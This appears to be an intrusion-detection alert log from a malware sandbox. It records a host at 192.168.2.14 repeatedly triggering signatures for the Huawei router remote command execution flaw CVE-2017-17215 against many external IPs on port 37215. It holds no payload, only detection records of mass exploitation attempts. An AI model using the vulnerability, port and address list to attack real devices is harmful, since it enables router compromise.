                                            06/14/24-10:43:52.145959TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5913637215192.168.2.1441.249.50.32
                                            06/14/24-10:44:02.365186TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5497237215192.168.2.14197.216.104.83
                                            06/14/24-10:44:22.882131TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6022237215192.168.2.14156.23.183.8
                                            06/14/24-10:44:33.148399TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5635237215192.168.2.1441.83.161.39
                                            06/14/24-10:44:14.672146TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4432437215192.168.2.14156.196.43.68
                                            06/14/24-10:43:58.276723TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5247237215192.168.2.1441.193.80.138
                                            06/14/24-10:44:02.367788TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4470037215192.168.2.1441.47.42.69
                                            06/14/24-10:44:24.917467TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4315437215192.168.2.14156.80.11.97
                                            06/14/24-10:44:29.025237TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3892037215192.168.2.14197.188.175.10
                                            06/14/24-10:43:39.790436TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5174237215192.168.2.14156.199.53.141
                                            06/14/24-10:44:22.878578TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4846037215192.168.2.14197.110.204.129
                                            06/14/24-10:43:41.848675TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5419637215192.168.2.14156.40.207.143
                                            06/14/24-10:44:18.762062TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4571037215192.168.2.14197.128.241.182
                                            06/14/24-10:43:45.968751TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5502437215192.168.2.14197.68.142.30
                                            06/14/24-10:44:12.625305TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4839437215192.168.2.14197.199.161.145
                                            06/14/24-10:43:54.201873TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3977437215192.168.2.1441.20.182.251
                                            06/14/24-10:44:22.859990TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5411237215192.168.2.14156.79.12.229
                                            06/14/24-10:43:56.224853TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5840437215192.168.2.14156.36.10.133
                                            06/14/24-10:44:29.011091TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5940237215192.168.2.14197.250.78.191
                                            06/14/24-10:43:36.725366TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3507237215192.168.2.1441.242.32.10
                                            06/14/24-10:44:04.411190TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5763637215192.168.2.1441.138.199.145
                                            06/14/24-10:43:34.679194TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4373037215192.168.2.1441.92.62.246
                                            06/14/24-10:43:58.291253TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5630437215192.168.2.1441.214.214.124
                                            06/14/24-10:43:50.073997TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5775037215192.168.2.14197.225.212.58
                                            06/14/24-10:43:45.966933TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5100837215192.168.2.14197.245.239.115
                                            06/14/24-10:43:50.110890TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5008837215192.168.2.14197.76.60.44
                                            06/14/24-10:44:16.715180TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4407037215192.168.2.14156.81.63.74
                                            06/14/24-10:44:08.518534TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4650837215192.168.2.1441.105.208.88
                                            06/14/24-10:43:36.717681TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5865637215192.168.2.14156.214.111.110
                                            06/14/24-10:44:12.641859TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3819837215192.168.2.14197.58.121.180
                                            06/14/24-10:44:31.051021TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4268237215192.168.2.1441.244.75.162
                                            06/14/24-10:44:24.941756TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4218837215192.168.2.14156.230.195.228
                                            06/14/24-10:43:58.293709TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5089837215192.168.2.14197.208.164.14
                                            06/14/24-10:43:56.242473TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5072437215192.168.2.14156.25.236.161
                                            06/14/24-10:44:14.668395TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4737837215192.168.2.14197.223.90.147
                                            06/14/24-10:44:18.775502TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5128837215192.168.2.1441.86.108.143
                                            06/14/24-10:44:29.024763TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5232037215192.168.2.14197.84.19.38
                                            06/14/24-10:43:36.699798TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3754237215192.168.2.14197.99.180.169
                                            06/14/24-10:44:29.027932TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5771037215192.168.2.14156.223.137.69
                                            06/14/24-10:44:26.977596TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5948837215192.168.2.14197.127.198.1
                                            06/14/24-10:44:18.776310TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3520037215192.168.2.1441.45.7.207
                                            06/14/24-10:44:12.615916TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6087237215192.168.2.14197.118.122.74
                                            06/14/24-10:43:37.759566TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3768237215192.168.2.14156.37.109.202
                                            06/14/24-10:44:18.763491TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6027637215192.168.2.1441.13.65.252
                                            06/14/24-10:44:10.567483TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5235037215192.168.2.14156.71.196.200
                                            06/14/24-10:44:18.760908TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5613037215192.168.2.1441.235.161.202
                                            06/14/24-10:44:08.518910TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4784437215192.168.2.14156.204.165.167
                                            06/14/24-10:44:22.860242TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3479037215192.168.2.14197.90.168.80
                                            06/14/24-10:43:48.018143TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4551237215192.168.2.14197.40.33.89
                                            06/14/24-10:43:34.676562TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5136437215192.168.2.14197.37.227.10
                                            06/14/24-10:43:45.969119TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5199237215192.168.2.14156.133.51.70
                                            06/14/24-10:44:20.827653TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5688237215192.168.2.14156.118.153.126
                                            06/14/24-10:44:33.134924TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3955437215192.168.2.1441.145.239.165
                                            06/14/24-10:44:22.858038TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5997637215192.168.2.14197.134.110.69
                                            06/14/24-10:43:34.662864TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3676037215192.168.2.14156.184.162.68
                                            06/14/24-10:43:45.991041TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3458837215192.168.2.1441.210.88.81
                                            06/14/24-10:44:14.685022TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4594437215192.168.2.1441.20.201.127
                                            06/14/24-10:44:14.667673TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5011437215192.168.2.1441.218.216.157
                                            06/14/24-10:44:31.056602TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3530637215192.168.2.14156.198.68.209
                                            06/14/24-10:44:31.056707TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3300237215192.168.2.14156.55.28.79
                                            06/14/24-10:44:04.419728TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5302237215192.168.2.14156.205.39.65
                                            06/14/24-10:44:00.337880TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5794637215192.168.2.14197.115.77.28
                                            06/14/24-10:43:45.989461TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3592437215192.168.2.14197.94.23.83
                                            06/14/24-10:44:10.544518TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4781037215192.168.2.14156.112.160.41
                                            06/14/24-10:43:45.969057TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5500037215192.168.2.1441.151.141.75
                                            06/14/24-10:44:08.502447TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4641837215192.168.2.14156.143.100.169
                                            06/14/24-10:44:29.015154TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4698437215192.168.2.14156.31.222.79
                                            06/14/24-10:43:39.812574TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5478037215192.168.2.1441.50.29.253
                                            06/14/24-10:43:45.968720TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4176037215192.168.2.1441.51.80.248
                                            06/14/24-10:43:37.762071TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3564437215192.168.2.1441.163.194.111
                                            06/14/24-10:44:08.503463TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5880437215192.168.2.14197.132.6.235
                                            06/14/24-10:44:16.718162TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4874837215192.168.2.14197.49.41.145
                                            06/14/24-10:43:56.226517TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5411237215192.168.2.14197.42.13.154
                                            06/14/24-10:43:52.149280TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4073637215192.168.2.14156.200.183.247
                                            06/14/24-10:44:31.084773TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5428237215192.168.2.14156.103.231.60
                                            06/14/24-10:44:35.179487TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4378637215192.168.2.14197.212.22.26
                                            06/14/24-10:44:08.503569TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4213837215192.168.2.14197.246.72.122
                                            06/14/24-10:43:45.991487TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4989437215192.168.2.14156.31.62.203
                                            06/14/24-10:43:36.726421TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3308637215192.168.2.14197.6.203.30
                                            06/14/24-10:43:50.111335TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3989837215192.168.2.14197.106.58.250
                                            06/14/24-10:44:14.667935TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5791237215192.168.2.1441.135.203.46
                                            06/14/24-10:44:20.805334TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3893437215192.168.2.1441.210.96.161
                                            06/14/24-10:43:36.702113TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5136437215192.168.2.1441.177.69.162
                                            06/14/24-10:43:37.763245TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5283437215192.168.2.14156.116.1.90
                                            06/14/24-10:44:10.548697TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4115037215192.168.2.1441.145.173.55
                                            06/14/24-10:44:26.986397TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5693637215192.168.2.14197.161.14.43
                                            06/14/24-10:43:41.848254TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5397637215192.168.2.14197.14.135.216
                                            06/14/24-10:44:31.092814TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5284437215192.168.2.14197.35.111.134
                                            06/14/24-10:43:52.159983TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5952437215192.168.2.1441.185.90.54
                                            06/14/24-10:43:37.763168TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4073037215192.168.2.14197.197.15.156
                                            06/14/24-10:43:34.660742TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3643237215192.168.2.1441.182.182.25
                                            06/14/24-10:44:20.803677TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3424837215192.168.2.14156.54.168.158
                                            06/14/24-10:44:22.862187TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3420037215192.168.2.14156.60.168.238
                                            06/14/24-10:44:20.804004TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5869437215192.168.2.1441.253.98.141
                                            06/14/24-10:44:00.324864TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4582837215192.168.2.1441.95.156.9
                                            06/14/24-10:44:18.776331TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4625637215192.168.2.1441.125.196.113
                                            06/14/24-10:44:31.051460TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4169637215192.168.2.14156.60.30.184
                                            06/14/24-10:44:14.681308TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3864437215192.168.2.14156.224.206.255
                                            06/14/24-10:43:50.071204TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5097437215192.168.2.14156.237.210.121
                                            06/14/24-10:43:58.293665TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3961037215192.168.2.14197.173.228.141
                                            06/14/24-10:44:06.453866TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3681637215192.168.2.14197.9.125.230
                                            06/14/24-10:43:58.276690TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5789237215192.168.2.14197.137.81.29
                                            06/14/24-10:44:10.548978TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4526237215192.168.2.1441.229.233.207
                                            06/14/24-10:44:10.582132TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4601237215192.168.2.14197.31.195.156
                                            06/14/24-10:43:54.201497TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4716437215192.168.2.1441.5.232.105
                                            06/14/24-10:44:33.150443TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4741037215192.168.2.14156.12.55.236
                                            06/14/24-10:44:02.369296TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5498837215192.168.2.14156.180.6.79
                                            06/14/24-10:44:14.672868TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3677637215192.168.2.14197.205.248.148
                                            06/14/24-10:43:34.679304TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3829037215192.168.2.1441.9.242.9
                                            06/14/24-10:44:22.881434TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5267437215192.168.2.14156.139.225.229
                                            06/14/24-10:43:36.728284TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5415837215192.168.2.14156.214.117.2
                                            06/14/24-10:43:41.850643TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4997037215192.168.2.14156.129.8.36
                                            06/14/24-10:44:04.419677TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4791837215192.168.2.1441.253.169.51
                                            06/14/24-10:44:31.092919TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4764837215192.168.2.14197.74.172.110
                                            06/14/24-10:43:39.792405TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5740637215192.168.2.14197.52.132.92
                                            06/14/24-10:44:33.149272TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5475637215192.168.2.14197.204.25.11
                                            06/14/24-10:44:00.323872TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4571837215192.168.2.14156.148.164.14
                                            06/14/24-10:44:02.387158TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3766237215192.168.2.1441.144.146.179
                                            06/14/24-10:43:36.727113TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5859037215192.168.2.14156.196.49.76
                                            06/14/24-10:43:54.198852TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3924037215192.168.2.14156.252.49.143
                                            06/14/24-10:44:22.861318TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5883637215192.168.2.14156.148.168.254
                                            06/14/24-10:43:48.030612TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4750037215192.168.2.14197.7.133.147
                                            06/14/24-10:44:12.644074TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3526637215192.168.2.14197.71.200.23
                                            06/14/24-10:43:52.143237TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4239837215192.168.2.14156.209.155.242
                                            06/14/24-10:43:56.230353TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3694437215192.168.2.1441.142.10.228
                                            06/14/24-10:44:33.134976TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4298437215192.168.2.14197.255.174.188
                                            06/14/24-10:44:22.881950TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4600437215192.168.2.14156.89.107.70
                                            06/14/24-10:44:33.134223TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5876637215192.168.2.14156.84.230.233
                                            06/14/24-10:44:12.625386TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3787237215192.168.2.1441.200.73.123
                                            06/14/24-10:43:54.203095TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5984437215192.168.2.14197.178.217.165
                                            06/14/24-10:43:58.275958TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3658237215192.168.2.1441.70.190.19
                                            06/14/24-10:44:04.404346TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5313037215192.168.2.14197.200.74.144
                                            06/14/24-10:43:56.246406TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5867037215192.168.2.14197.198.170.76
                                            06/14/24-10:44:22.859021TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4013237215192.168.2.14197.168.131.225
                                            06/14/24-10:44:02.365029TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5804837215192.168.2.14197.34.34.145
                                            06/14/24-10:44:10.544628TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4644237215192.168.2.14156.200.138.15
                                            06/14/24-10:44:10.568764TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5071237215192.168.2.14197.211.40.114
                                            06/14/24-10:44:24.917307TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4202437215192.168.2.1441.78.91.181
                                            06/14/24-10:43:48.032120TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5754437215192.168.2.14156.241.184.71
                                            06/14/24-10:44:10.567360TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4209037215192.168.2.14156.1.197.71
                                            06/14/24-10:43:34.678461TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5413037215192.168.2.14197.86.144.0
                                            06/14/24-10:43:52.143496TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3774837215192.168.2.14156.250.9.154
                                            06/14/24-10:44:16.719072TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5298437215192.168.2.14197.103.86.152
                                            06/14/24-10:43:54.183950TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5284637215192.168.2.14156.177.96.37
                                            06/14/24-10:43:56.250908TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5916637215192.168.2.1441.180.77.144
                                            06/14/24-10:43:48.016696TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3763637215192.168.2.14197.156.223.231
                                            06/14/24-10:43:50.072868TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5952837215192.168.2.14156.194.42.74
                                            06/14/24-10:44:06.452846TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5766037215192.168.2.14156.183.27.49
                                            06/14/24-10:44:06.452403TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4081437215192.168.2.1441.235.211.176
                                            06/14/24-10:44:31.082485TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4886237215192.168.2.1441.164.64.205
                                            06/14/24-10:44:35.181969TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3409837215192.168.2.14156.23.172.116
                                            06/14/24-10:44:22.880280TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5715437215192.168.2.14197.1.42.192
                                            06/14/24-10:44:04.411740TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3826037215192.168.2.1441.93.44.94
                                            06/14/24-10:44:08.501327TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3529437215192.168.2.14156.176.166.186
                                            06/14/24-10:43:43.971768TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5967037215192.168.2.1441.114.107.131
                                            06/14/24-10:43:45.985397TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5826037215192.168.2.1441.167.212.244
                                            06/14/24-10:44:12.643021TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4832837215192.168.2.14156.104.71.218
                                            06/14/24-10:44:24.913825TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5850637215192.168.2.14197.43.238.133
                                            06/14/24-10:44:02.367516TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3315237215192.168.2.14156.245.238.101
                                            06/14/24-10:44:20.831406TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3598437215192.168.2.14156.253.125.86
                                            06/14/24-10:44:26.999967TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4437237215192.168.2.14156.128.245.49
                                            06/14/24-10:44:33.132643TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3635037215192.168.2.1441.183.88.245
                                            06/14/24-10:43:39.808715TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3408237215192.168.2.14197.244.47.194
                                            06/14/24-10:43:58.274323TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5326237215192.168.2.14156.40.11.21
                                            06/14/24-10:44:24.917773TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3839637215192.168.2.14156.221.90.226
                                            06/14/24-10:43:45.984437TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4087237215192.168.2.14156.13.5.193
                                            06/14/24-10:43:34.663675TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4135837215192.168.2.1441.60.252.190
                                            06/14/24-10:43:56.244581TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5238037215192.168.2.14156.174.183.90
                                            06/14/24-10:44:29.024895TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5043437215192.168.2.1441.108.100.119
                                            06/14/24-10:43:34.660395TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4430837215192.168.2.14156.224.103.158
                                            06/14/24-10:43:50.074708TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5933037215192.168.2.1441.210.152.93
                                            06/14/24-10:44:06.453086TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4220037215192.168.2.14197.144.162.245
                                            06/14/24-10:44:24.917706TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3953437215192.168.2.1441.90.101.19
                                            06/14/24-10:44:26.978629TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5848237215192.168.2.14197.84.151.211
                                            06/14/24-10:44:33.134440TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4735437215192.168.2.1441.151.61.90
                                            06/14/24-10:44:26.986110TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4161837215192.168.2.14156.19.2.132
                                            06/14/24-10:43:54.201232TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3689237215192.168.2.14197.139.216.6
                                            06/14/24-10:43:58.291871TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5060437215192.168.2.14197.186.32.163
                                            06/14/24-10:44:02.367119TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3421837215192.168.2.14156.141.136.21
                                            06/14/24-10:43:50.110996TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5828637215192.168.2.1441.16.45.130
                                            06/14/24-10:44:20.807707TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5616437215192.168.2.14156.154.252.122
                                            06/14/24-10:44:08.504222TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3826037215192.168.2.14197.62.59.62
                                            06/14/24-10:43:50.115996TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5043637215192.168.2.14197.192.92.129
                                            06/14/24-10:44:08.504853TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4805237215192.168.2.14197.14.119.125
                                            06/14/24-10:44:20.831514TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4398437215192.168.2.14197.146.118.192
                                            06/14/24-10:44:00.335970TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5043637215192.168.2.14156.185.41.223
                                            06/14/24-10:43:41.900189TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5620837215192.168.2.1441.184.127.229
                                            06/14/24-10:44:26.978071TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4610837215192.168.2.1441.99.42.160
